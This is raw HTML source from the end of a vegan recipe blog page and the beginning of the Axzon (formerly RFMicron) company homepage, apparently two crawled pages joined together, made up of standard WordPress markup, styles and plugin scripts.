src="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/02/chipotle-lentil-avocado-toast-5.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="This Chipotle Lentil Avocado Toast is the ultimate vegan brunch meal - sourdough bread topped with avocado, greens and warm chipotle lentils | ThisSavoryVegan.com #thissavoryvegan #vegan #veganbrunch" itemprop="image" srcset="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/02/chipotle-lentil-avocado-toast-5.jpg?resize=680%2C900&amp;ssl=1 680w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/02/chipotle-lentil-avocado-toast-5.jpg?resize=340%2C450&amp;ssl=1 340w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/02/chipotle-lentil-avocado-toast-5.jpg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/02/chipotle-lentil-avocado-toast-5.jpg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/chipotle-lentil-avocado-toast/">Chipotle Lentil Avocado Toast</a></h2></header></article></div></section> </div> <!-- end .home-bottom --></main><aside class="sidebar sidebar-primary widget-area" role="complementary" aria-label="Primary Sidebar" itemscope itemtype="https://schema.org/WPSideBar" id="genesis-sidebar-primary"><h2 class="genesis-sidebar-title screen-reader-text">Primary Sidebar</h2><section id="media_image-2" class="widget widget_media_image"><div class="widget-wrap"><img width="512" height="512" src="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2016/10/cropped-Savory-Vegan-1.jpg?fit=512%2C512&amp;ssl=1" class="image wp-image-204 alignnone attachment-full size-full" alt="" style="max-width: 100%; height: auto;" srcset="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2016/10/cropped-Savory-Vegan-1.jpg?w=512&amp;ssl=1 512w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2016/10/cropped-Savory-Vegan-1.jpg?resize=150%2C150&amp;ssl=1 150w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2016/10/cropped-Savory-Vegan-1.jpg?resize=300%2C300&amp;ssl=1 300w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2016/10/cropped-Savory-Vegan-1.jpg?resize=320%2C320&amp;ssl=1 320w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2016/10/cropped-Savory-Vegan-1.jpg?resize=270%2C270&amp;ssl=1 270w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2016/10/cropped-Savory-Vegan-1.jpg?resize=192%2C192&amp;ssl=1 192w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2016/10/cropped-Savory-Vegan-1.jpg?resize=180%2C180&amp;ssl=1 180w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2016/10/cropped-Savory-Vegan-1.jpg?resize=32%2C32&amp;ssl=1 32w" sizes="(max-width: 512px) 100vw, 512px" /></div></section> <section id="media_image-3" class="widget widget_media_image"><div class="widget-wrap"><a href="https://www.subscribepage.com/email-sign-up-tsv"><img width="360" height="720" src="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2018/04/sidebar.jpeg?fit=360%2C720&amp;ssl=1" class="image wp-image-2815 attachment-full size-full" alt="" style="max-width: 100%; height: auto;" srcset="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2018/04/sidebar.jpeg?w=360&amp;ssl=1 360w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2018/04/sidebar.jpeg?resize=150%2C300&amp;ssl=1 150w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2018/04/sidebar.jpeg?resize=300%2C600&amp;ssl=1 300w" sizes="(max-width: 360px) 100vw, 360px" /></a></div></section> <section id="facebook-likebox-2" class="widget widget_facebook_likebox"><div class="widget-wrap"><h3 class="widgettitle widget-title"><a href="https://www.facebook.com/thissavoryvegan/">Like us on Facebook</a></h3> <div id="fb-root"></div> <div class="fb-page" data-href="https://www.facebook.com/thissavoryvegan/" data-width="340" data-height="432" data-hide-cover="false" data-show-facepile="true" data-show-posts="false"> <div class="fb-xfbml-parse-ignore"><blockquote cite="https://www.facebook.com/thissavoryvegan/"><a href="https://www.facebook.com/thissavoryvegan/">Like us on Facebook</a></blockquote></div> </div> </div></section> <section id="wpc_pinterest_widget-2" class="widget widget_wpc_pinterest_widget"><div class="widget-wrap"><h3 class="widgettitle widget-title">Like us on Pinterest</h3> <a data-pin-do="embedUser" href="https://www.pinterest.com/thissavoryvegan//" data-pin-scale-width="158" data-pin-scale-height="350" data-pin-board-width="320"></a></div></section> </aside></div></div><footer class="site-footer" itemscope itemtype="https://schema.org/WPFooter"><div class="wrap"><div id="sb_instagram" class="sbi sbi_mob_col_auto sbi_fixed_height sbi_col_6" style="width:100%; height:275px; " data-id="1716977218" data-num="6" data-res="auto" data-cols="6" data-options='{&quot;sortby&quot;: &quot;none&quot;, &quot;showbio&quot;: &quot;false&quot;,&quot;feedID&quot;: &quot;1716977218&quot;, &quot;headercolor&quot;: &quot;&quot;, &quot;imagepadding&quot;: &quot;&quot;,&quot;mid&quot;: &quot;M2E4MWE5Zg==&quot;, &quot;disablecache&quot;: &quot;false&quot;, &quot;sbiCacheExists&quot;: &quot;true&quot;,&quot;callback&quot;: &quot;ODY2YjIxYjMwNTYz.NDBiZDgxM2MwOTI1OWY1YzNhMzM=&quot;, &quot;sbiHeaderCache&quot;: &quot;true&quot;}'><div id="sbi_images"><div class="sbi_loader"></div></div><div id="sbi_load" class="sbi_hidden" style="padding-top: 5px"><span class="sbi_follow_btn"><a href="https://www.instagram.com/" style="" target="_blank" rel="noopener"><i class="fa fab fa-instagram"></i>Follow on Instagram</a></span></div></div> <p>Copyright &#x000A9;&nbsp;2019 &middot; This Savory Vegan &middot; by Rene Barker</p></div></footer></div><script> setTimeout (function() {Array.prototype.forEach.call (document.querySelectorAll (".ai-viewports"), function (element, index) {ai_insert_viewport (element);});}, 10); </script> <!-- Instagram Feed JS --> <script type="text/javascript"> var sbiajaxurl = "https://www.thissavoryvegan.com/wp-admin/admin-ajax.php"; </script> <div style="display:none"> </div> <script type='text/javascript'>jQuery(document).ready(function($) {$(".flexslider").flexslider({controlsContainer: "#genesis-responsive-slider",animation: "slide",directionNav: 1,controlNav: 0,animationDuration: 800,slideshowSpeed: 4000 }); });</script><style type="text/css" media="screen"> #simple-social-icons-2 ul li a, #simple-social-icons-2 ul li a:hover, #simple-social-icons-2 ul li a:focus { background-color: #ffffff !important; border-radius: 3px; color: #999999 !important; border: 0px #ffffff solid !important; font-size: 18px; padding: 9px; } #simple-social-icons-2 ul li a:hover, #simple-social-icons-2 ul li a:focus { background-color: #ffffff !important; border-color: #ffffff !important; color: #999999 !important; } #simple-social-icons-2 ul li a:focus { outline: 1px dotted #ffffff !important; }</style><script type='text/javascript' src='//assets.pinterest.com/js/pinit.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var wprm_public = {"settings":{"features_comment_ratings":true},"home_url":"https:\/\/www.thissavoryvegan.com\/","permalinks":"\/%postname%\/","ajax_url":"https:\/\/www.thissavoryvegan.com\/wp-admin\/admin-ajax.php","nonce":"b750782c26","api_nonce":"88de32f856"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-content/plugins/wp-recipe-maker/dist/public-legacy.js'></script> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-content/plugins/jetpack/_inc/build/photon/photon.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/www.thissavoryvegan.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-content/plugins/contact-form-7/includes/js/scripts.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var sb_instagram_js_options = {"sb_instagram_at":"1716977218.M2E4MWE5Zg==.ODY2YjIxYjMwNTYz.NDBiZDgxM2MwOTI1OWY1YzNhMzM=","font_method":"svg"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-content/plugins/instagram-feed/js/sb-instagram.min.js'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js'></script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-content/plugins/jetpack/modules/wpgroho.js'></script> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-content/themes/genesis/lib/js/skip-links.min.js'></script> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-content/themes/foodiepro-v320/js/general.js'></script> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-content/plugins/genesis-responsive-slider/assets/js/jquery.flexslider.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var jpfbembed = {"appid":"249643311490","locale":"en_US"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-content/plugins/jetpack/_inc/build/facebook-embed.min.js'></script> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-content/plugins/official-mailerlite-sign-up-forms/assets/js/jquery.validate.min.js'></script> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-content/plugins/page-links-to/js/new-tab.min.js'></script> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-includes/js/wp-embed.min.js'></script> <script type='text/javascript' src='//assets.pinterest.com/js/pinit.js'></script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3.1',blog:'115835969',post:'0',tz:'-7',srv:'www.thissavoryvegan.com'} ]); _stq.push([ 'clickTrackerInit', '115835969', '0' ]); </script> </body></html> <!-- Dynamic page generated in 0.571 seconds. --> <!-- Cached page generated by WP-Super-Cache on 2019-05-16 08:37:40 --> <!-- Compression = gzip -->
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Axzon (formerly RFMicron) - Sensing Data Insights - Axzon website</title> <!-- Google Tag Manager for WordPress by gtm4wp.com --> <script data-cfasync="false" type="text/javascript">//<![CDATA[ var gtm4wp_datalayer_name = "dataLayer"; var dataLayer = dataLayer || []; //]]> </script> <!-- End Google Tag Manager for WordPress by gtm4wp.com --> <!-- This site is optimized with the Yoast SEO plugin v9.7 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="https://axzon.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Axzon (formerly RFMicron) - Sensing Data Insights - Axzon website" /> <meta property="og:url" content="https://axzon.com/" /> <meta property="og:site_name" content="Axzon website" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:title" content="Axzon (formerly RFMicron) - Sensing Data Insights - Axzon website" /> <meta name="twitter:image" content="https://axzon.com/wp-content/uploads/2018/04/RFMicron-is-now-Axzon_April-2018_optimize.png" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://axzon.com/#website","url":"https://axzon.com/","name":"Axzon website","potentialAction":{"@type":"SearchAction","target":"https://axzon.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Organization","url":"https://axzon.com/","sameAs":[],"@id":"https://axzon.com/#organization","name":"Axzon","logo":""}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Axzon website &raquo; Feed" href="https://axzon.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Axzon website &raquo; Comments Feed" href="https://axzon.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/axzon.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://axzon.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-theme-css' href='https://axzon.com/wp-includes/css/dist/block-library/theme.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://axzon.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.2' type='text/css' media='all' /> <link rel='stylesheet' id='cool-tag-cloud-css' href='https://axzon.com/wp-content/plugins/cool-tag-cloud/inc/cool-tag-cloud.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='essential-grid-plugin-settings-css' href='https://axzon.com/wp-content/plugins/essential-grid/public/assets/css/settings.css?ver=2.3.2' type='text/css' media='all' /> <link rel='stylesheet' id='tp-open-sans-css' href='https://fonts.googleapis.com/css?family=Open+Sans%3A300%2C400%2C600%2C700%2C800&#038;ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='tp-raleway-css' href='https://fonts.googleapis.com/css?family=Raleway%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900&#038;ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='tp-droid-serif-css' href='https://fonts.googleapis.com/css?family=Droid+Serif%3A400%2C700&#038;ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='tp-fontello-css' href='https://axzon.com/wp-content/plugins/essential-grid/public/assets/font/fontello/css/fontello.css?ver=2.3.2' type='text/css' media='all' /> <link rel='stylesheet' id='gdpr-css' href='https://axzon.com/wp-content/plugins/gdpr/assets/css/gdpr-public.css?ver=2.1.0' type='text/css' media='all' /> <link rel='stylesheet' id='rs-plugin-settings-css' href='https://axzon.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.2' type='text/css' media='all' /> <style id='rs-plugin-settings-inline-css' type='text/css'> #rs-demo-id {} </style> <link rel='stylesheet' id='wp-post-navigation-style-css' href='https://axzon.com/wp-content/plugins/wp-post-navigation/style.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-pagenavi-css' href='https://axzon.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css?ver=2.70' type='text/css' media='all' /> <link rel='stylesheet' id='dlm-frontend-css' href='https://axzon.com/wp-content/plugins/download-monitor/assets/css/frontend.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='u-design-reset-css' href='https://axzon.com/wp-content/themes/u-design/assets/css/frontend/layout/reset.css?ver=1.0' type='text/css' media='screen' /> <link rel='stylesheet' id='u-design-grid-960-css' href='https://axzon.com/wp-content/themes/u-design/assets/css/frontend/layout/960.css?ver=1.0' type='text/css' media='screen' /> <link rel='stylesheet' id='u-design-superfish_menu-css' href='https://axzon.com/wp-content/themes/u-design/inc/frontend/superfish-menu/css/superfish.css?ver=1.7.2' type='text/css' media='screen' /> <link rel='stylesheet' id='u-design-pretty_photo-css' href='https://axzon.com/wp-content/themes/u-design/inc/frontend/prettyPhoto/css/prettyPhoto.css?ver=3.1.6' type='text/css' media='screen' /> <link rel='stylesheet' id='u-design-font-awesome-css' href='https://axzon.com/wp-content/themes/u-design/inc/shared/font-awesome/css/font-awesome.min.css?ver=3.1.2' type='text/css' media='screen' /> <link rel='stylesheet' id='u-design-style-css' href='https://axzon.com/wp-content/themes/u-design/assets/css/frontend/global/style.css?ver=3.1.2' type='text/css' media='screen' /> <link rel='stylesheet' id='u-design-custom-style-css' href='https://axzon.com/wp-content/themes/u-design/assets/css/frontend/global/custom_style.css?ver=3.1.2.1551585152' type='text/css' media='screen' /> <link rel='stylesheet' id='u-design-responsive-css' href='https://axzon.com/wp-content/themes/u-design/assets/css/frontend/layout/responsive.css?ver=3.1.2' type='text/css' media='screen' /> <link rel='stylesheet' id='u-design-style-orig-css' href='https://axzon.com/wp-content/themes/u-design-child/style.css?ver=3.1.2' type='text/css' media='screen' /> <!--[if lte IE 9]> <link rel='stylesheet' id='u-design-ie9-css' href='https://axzon.com/wp-content/themes/u-design/assets/css/frontend/layout/ie-all.css?ver=3.1.2' type='text/css' media='screen' /> <![endif]--> <link rel='stylesheet' id='wp-add-custom-css-css' href='https://axzon.com?display_custom_css=css&#038;ver=5.1.1' type='text/css' media='all' /> <script>if (document.location.protocol != "https:") {document.location = document.URL.replace(/^http:/i, "https:");}</script><script type='text/javascript' src='https://axzon.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://axzon.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://axzon.com/wp-content/plugins/wp-cart-for-digital-products/lib/jquery.external.lib.js?ver=5.1.1'></script> <script type='text/javascript' src='https://axzon.com/wp-content/plugins/wp-cart-for-digital-products/lib/jquery.lightbox-0.5.pack.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var GDPR = {"ajaxurl":"https:\/\/axzon.com\/wp-admin\/admin-ajax.php","logouturl":"","i18n":{"aborting":"Aborting","logging_out":"You are being logged out.","continue":"Continue","cancel":"Cancel","ok":"OK","close_account":"Close your account?","close_account_warning":"Your account will be closed and all data will be permanently deleted and cannot be recovered. Are you sure?","are_you_sure":"Are you sure?","policy_disagree":"By disagreeing you will no longer have access to our site and will be logged out."},"is_user_logged_in":"","refresh":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://axzon.com/wp-content/plugins/gdpr/assets/js/gdpr-public.js?ver=2.1.0'></script> <script type='text/javascript' src='https://axzon.com/wp-content/plugins/essential-grid/public/assets/js/jquery.esgbox.min.js?ver=2.3.2'></script> <script type='text/javascript' src='https://axzon.com/wp-content/plugins/essential-grid/public/assets/js/jquery.themepunch.tools.min.js?ver=2.3.2'></script> <script type='text/javascript' src='https://axzon.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.2'></script> <script type='text/javascript' src='https://axzon.com/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tracker.js?ver=1.9.2'></script> <script type='text/javascript' src='https://axzon.com/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-form-move-tracker.js?ver=1.9.2'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://axzon.com/wp-content/themes/u-design/assets/js/frontend/respond.min.js?ver=1.4.2'></script> <![endif]--> <link rel='https://api.w.org/' href='https://axzon.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://axzon.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://axzon.com/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='https://axzon.com/' /> <link rel="alternate" type="application/json+oembed" href="https://axzon.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Faxzon.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://axzon.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Faxzon.com%2F&#038;format=xml" /> <script type="text/javascript"> var ajaxRevslider; jQuery(document).ready(function() { // CUSTOM AJAX CONTENT LOADING FUNCTION ajaxRevslider = function(obj) { // obj.type : Post Type // obj.id : ID of Content to Load // obj.aspectratio : The Aspect Ratio of the Container / Media // obj.selector : The Container Selector where the Content of Ajax will be injected. It is done via the Essential Grid on Return of Content var content = ""; data = {}; data.action = 'revslider_ajax_call_front'; data.client_action = 'get_slider_html'; data.token = 'f11835ef14'; data.type = obj.type; data.id = obj.id; data.aspectratio = obj.aspectratio; // SYNC AJAX REQUEST jQuery.ajax({ type:"post", url:"https://axzon.com/wp-admin/admin-ajax.php", dataType: 'json', data:data, async:false, success: function(ret, textStatus, XMLHttpRequest) { if(ret.success == true) content = ret.data; }, error: function(e) { console.log(e); } }); // FIRST RETURN THE CONTENT WHEN IT IS LOADED !! return content; }; // CUSTOM AJAX FUNCTION TO REMOVE THE SLIDER var ajaxRemoveRevslider = function(obj) { return jQuery(obj.selector+" .rev_slider").revkill(); }; // EXTEND THE AJAX CONTENT LOADING TYPES WITH TYPE AND FUNCTION var extendessential = setInterval(function() { if (jQuery.fn.tpessential != undefined) { clearInterval(extendessential); if(typeof(jQuery.fn.tpessential.defaults) !== 'undefined') { jQuery.fn.tpessential.defaults.ajaxTypes.push({type:"revslider",func:ajaxRevslider,killfunc:ajaxRemoveRevslider,openAnimationSpeed:0.3}); // type: Name of the Post to load via Ajax into the Essential Grid Ajax Container // func: the Function Name which is Called once the Item with the Post Type has been clicked // killfunc: function to kill in case the Ajax Window going to be removed (before Remove function ! // openAnimationSpeed: how quick the Ajax Content window should be animated (default is 0.3) } } },30); }); </script> <link type="text/css" rel="stylesheet" href="https://axzon.com/wp-content/plugins/wp-cart-for-digital-products/wp_eStore_style.css?ver=8.0.3" /> <link type="text/css" rel="stylesheet" href="https://axzon.com/wp-content/plugins/wp-cart-for-digital-products/wp_eStore_custom_style.css" /> <!-- WP eStore plugin v8.0.3 - http://www.tipsandtricks-hq.com/wordpress-estore-plugin-complete-solution-to-sell-digital-products-from-your-wordpress-blog-securely-1059/ --> <script type="text/javascript"> JS_WP_ESTORE_CURRENCY_SYMBOL = "$"; JS_WP_ESTORE_VARIATION_ADD_STRING = "+"; JS_WP_ESTORE_VARIATION_DECIMAL_SEPERATOR = "."; JS_WP_ESTORE_VARIATION_THOUSAND_SEPERATOR = ","; JS_WP_ESTORE_VARIATION_CURRENCY_POS = "left"; JS_WP_ESTORE_VARIATION_NUM_OF_DECIMALS = "2"; JS_WP_ESTORE_MINIMUM_PRICE_YOU_CAN_ENTER = "The minimum amount you can specify is "; JS_WP_ESTORE_URL = "https://axzon.com/wp-content/plugins/wp-cart-for-digital-products"; JS_WP_ESTORE_SELECT_OPTION_STRING = "Select Option"; JS_WP_ESTORE_SELECT_OPTION_ERROR_MSG = "You need to select an option before you can proceed.";</script><script type="text/javascript" src="https://axzon.com/wp-content/plugins/wp-cart-for-digital-products/lib/eStore_read_form.js?ver=8.0.3"></script><style type="text/css"> .wp-post-navigation a{ text-decoration: none; font:bold 16px sans-serif, arial; color: #000; } </style> <!-- Google Tag Manager for WordPress by gtm4wp.com --> <script data-cfasync="false" type="text/javascript">//<![CDATA[ dataLayer.push({"pagePostType":"frontpage","pagePostType2":"single-page","pagePostAuthor":"rfmicronadmin"});//]]> </script> <script data-cfasync="false">//<![CDATA[ (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= '//www.googletagmanager.com/gtm.'+'js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-KRKV64G');//]]> </script> <!-- End Google Tag Manager --> <!-- End Google Tag Manager for WordPress by gtm4wp.com --><!-- All in one Favicon 4.7 --><link rel="icon" href="https://axzon.com/wp-content/uploads/2018/05/Axzon-favicon.png" type="image/png"/> <meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://axzon.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--> <!-- BEGIN recaptcha, injected by plugin wp-recaptcha-integration --> <!-- END recaptcha --> <meta name="generator" content="Powered by Slider Revolution 5.4.8.2 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <link rel="pingback" href="https://axzon.com/xmlrpc.php" /> <script type="text/javascript">function setREVStartSize(e){ try{ e.c=jQuery(e.c);var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0; if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f}) }catch(d){console.log("Failure at Presize of Slider:"+d)} };</script> <noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> </head> <body data-rsssl=1 class="home page-template page-template-page-FullWidth page-template-page-FullWidth-php page page-id-5 wp-embed-responsive u-design-responsive-on wpb-js-composer js-comp-ver-5.6 vc_responsive udesign-is-global-page-width udesign-fa"> <div id="wrapper-1"> <header id="top-wrapper"> <div id="top-elements" class="container_24"> <div id="logo" class="grid_14"> <h1><a title="Axzon website" href="https://axzon.com">Axzon website</a></h1> </div> <div class="social-media-area grid_9 prefix_15"> <div class="social_media_top widget_search substitute_widget_class"> <form role="search" method="get" id="searchform" class="searchform" action="https://axzon.com/" > <div> <label class="screen-reader-text" for="s">Search for:</label> <input type="text" id="s" name="s" value="" placeholder="Type here to search"> <input type="submit" id="searchsubmit" value="Search" /> </div> </form> </div><div class="social_media_top widget_black_studio_tinymce substitute_widget_class"><div class="textwidget"><p><a href="http://community.rfmicron.com/wp-login.php">Log In / Register</a></p> </div></div> </div><!-- end social-media-area --> </div> <!-- end top-elements --> <div class="clear"></div> <nav id="main-menu"> <div id="dropdown-holder" class="container_24"> <div id="navigation-menu" class="navigation-menu"><ul id="main-top-menu" class="sf-menu"><li id="menu-item-335" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-335"><a href="https://axzon.com/industries/"><span>Industries</span></a></li> <li id="menu-item-334" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-334"><a href="https://axzon.com/products/"><span>Products</span></a></li> <li id="menu-item-18" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-18"><a href="#"><span>Technology</span></a> <ul class="sub-menu"> <li id="menu-item-356" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-356"><a href="https://axzon.com/sensing-data-insights/"><span>Sensing Data Insights</span></a></li> <li id="menu-item-355" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-355"><a href="https://axzon.com/technology/"><span>Distinguishing Features</span></a></li> </ul> </li> <li id="menu-item-19" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-19"><a href="#"><span>Community &#038; Support</span></a> <ul class="sub-menu"> <li id="menu-item-28" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-28"><a href="http://community.rfmicron.com/"><span>Community Forum</span></a></li> <li id="menu-item-357" class="menu-item 